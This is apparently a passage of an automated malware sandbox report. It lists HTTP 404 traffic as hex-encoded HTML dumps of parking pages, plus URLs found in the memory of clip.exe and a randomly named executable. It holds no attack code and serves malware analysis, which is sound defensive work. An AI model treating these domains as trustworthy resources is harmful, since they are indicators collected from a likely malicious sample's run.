            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jul 2024 14:54:51 GMTServer: ApacheContent-Length: 16026Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 
3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22 47 6c 61 73 73 43 6c 69 70 22 3e 0a 20 20 20 20 20 20 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jul 2024 14:54:54 GMTServer: ApacheContent-Length: 16026Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 
3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22 47 6c 61 73 73 43 6c 69 70 22 3e 0a 20 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jul 2024 14:55:00 GMTServer: Apache/2.4.56 (Debian)X-Powered-By: PHP/7.4.33Strict-Transport-Security: max-age=63072000; preloadConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 64 33 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 6f 6d 61 69 6e 20 77 77 77 2e 73 61 6e 64 72 61 6e 6f 6c 6c 2e 63 6f 6d 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 62 79 20 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b c2 ae 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 6c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 73 2e 63 73 73 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 6b 69 6e 67 5f 70 61 67 65 5f 68 65 61 64 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 6b 69 6e 67 5f 70 61 67 65 5f 68 65 61 64 65 72 5f 69 6e 6e 65 72 
22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 64 6f 6d 61 69 6e 74 65 63 68 6e 69 6b 2e 61 74 2f 64 61 74 61 2f 67 66 78 2f 64 74 5f 6c 6f 67 6f 5f 70 61 72 6b 69 6e 67 2e 70 6e 67 22 20 61 6c 74 3d 22 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b 2e 61 74 20 4c 6f 67 6f 22 20 2f 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 3e 54 68 65 20 44 6f 6d 61 69 6e 20 77 77 77 2e 73 61 6e 64 72 61 6e 6f 6c 6c 2e 63 6f 6d 20 69 73 20 72 65 67 69 73 74 65 72 65 64 21 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 70 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 3a 32 30 70 78 20 30 20 31 30 70 78 20 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 22 20 63 6c 61 73 73 3d 22 61 6c 69 67 6e 2d 63 65 6e 74 65 72 22 3e 41 6c 73 20 44 6f 6d 61 69 6e 69 6e 68 61 62 65 72 20 6b 26 6f 75 6d 6c 3b 6e 6e 65 6e 20 53 69 65 20 49 68 72 65 20 44 6f 6d 61 69 6e 73 20 6f 6e 6c 69 6e 65 20 76 65 72 77 61 6c 74 65 6e 2c
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 04 Jul 2024 14:55:02 GMTServer: Apache/2.4.56 (Debian)X-Powered-By: PHP/7.4.33Strict-Transport-Security: max-age=63072000; preloadConnection: Upgrade, closeTransfer-Encoding: chunkedContent-Type: text/html; charset=UTF-8Data Raw: 64 32 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 6f 6d 61 69 6e 20 77 77 77 2e 73 61 6e 64 72 61 6e 6f 6c 6c 2e 63 6f 6d 20 69 73 20 72 65 67 69 73 74 65 72 65 64 20 62 79 20 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b c2 ae 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 68 74 6d 6c 2b 78 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 6c 61 6e 67 75 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 65 6e 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 63 73 73 2f 73 74 79 6c 65 73 2e 63 73 73 22 20 2f 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 6b 69 6e 67 5f 70 61 67 65 5f 68 65 61 64 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 69 64 3d 22 70 61 72 6b 69 6e 67 5f 70 61 67 65 5f 68 65 61 64 65 72 5f 69 6e 6e 65 72 
22 3e 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 64 6f 6d 61 69 6e 74 65 63 68 6e 69 6b 2e 61 74 2f 64 61 74 61 2f 67 66 78 2f 64 74 5f 6c 6f 67 6f 5f 70 61 72 6b 69 6e 67 2e 70 6e 67 22 20 61 6c 74 3d 22 44 6f 6d 61 69 6e 74 65 63 68 6e 69 6b 2e 61 74 20 4c 6f 67 6f 22 20 2f 3e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 3e 54 68 65 20 44 6f 6d 61 69 6e 20 77 77 77 2e 73 61 6e 64 72 61 6e 6f 6c 6c 2e 63 6f 6d 20 69 73 20 72 65 67 69 73 74 65 72 65 64 21 3c 2f 68 31 3e 0a 0a 20 20 20 20 20 20 20 20 3c 70 20 73 74 79 6c 65 3d 22 70 61 64 64 69 6e 67 3a 32 30 70 78 20 30 20 31 30 70 78 20 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 32 65 6d 3b 22 20 63 6c 61 73 73 3d 22 61 6c 69 67 6e 2d 63 65 6e 74 65 72 22 3e 41 6c 73 20 44 6f 6d 61 69 6e 69 6e 68 61 62 65 72 20 6b 26 6f 75 6d 6c 3b 6e 6e 65 6e 20 53 69 65 20 49 68 72 65 20 44 6f 6d 61 69 6e 73 20 6f 6e 6c 69 6e 65 20 76 65 72 77 61 6c 74 65 6e 2c
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 04 Jul 2024 14:55:05 GMT Server: Apache/2.4.56 (Debian) X-Powered-By: PHP/7.4.33 Strict-Transport-Security: max-age=63072000; preload Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Date: Thu, 04 Jul 2024 14:55:07 GMT Server: Apache/2.4.56 (Debian) X-Powered-By: PHP/7.4.33 Strict-Transport-Security: max-age=63072000; preload Connection: Upgrade, close Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Thu, 04 Jul 2024 14:55:27 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Thu, 04 Jul 2024 14:55:29 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Thu, 04 Jul 2024 14:55:32 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip
            Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not Found Server: nginx Date: Thu, 04 Jul 2024 14:55:34 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close
            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot
            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.eot?#iefix
            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.otf
            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.svg#montserrat-bold
            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.ttf
            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff
            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-bold/montserrat-bold.woff2
            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot
            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.eot?#iefix
            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.otf
            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.svg#montserrat-regular
            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.ttf
            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff
            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/fonts/montserrat-regular/montserrat-regular.woff2
            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/js/min.js?v2.3
            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/pics/28903/search.png)
            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/pics/28905/arrrow.png)
            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/pics/29590/bg1.png)
            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
            Source: clip.exe, 00000009.00000002.3768118603.0000000005EB2000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.0000000003D12000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut
            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.Bfiworkerscomp.com
            Source: clip.exe, 00000009.00000002.3768118603.00000000059FC000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000009.00000002.3771427348.0000000007A20000.00000004.00000800.00020000.00000000.sdmp, ftlDDsmJxbqfWuvUNSEx.exe, 0000000B.00000002.3763185385.000000000385C000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.bfiworkerscomp.com/Alternative_Financing.cfm?fp=4x%2Bj9sdm3eC7HUqiUq%2FlUrOWlceBTk4Vo1G%2
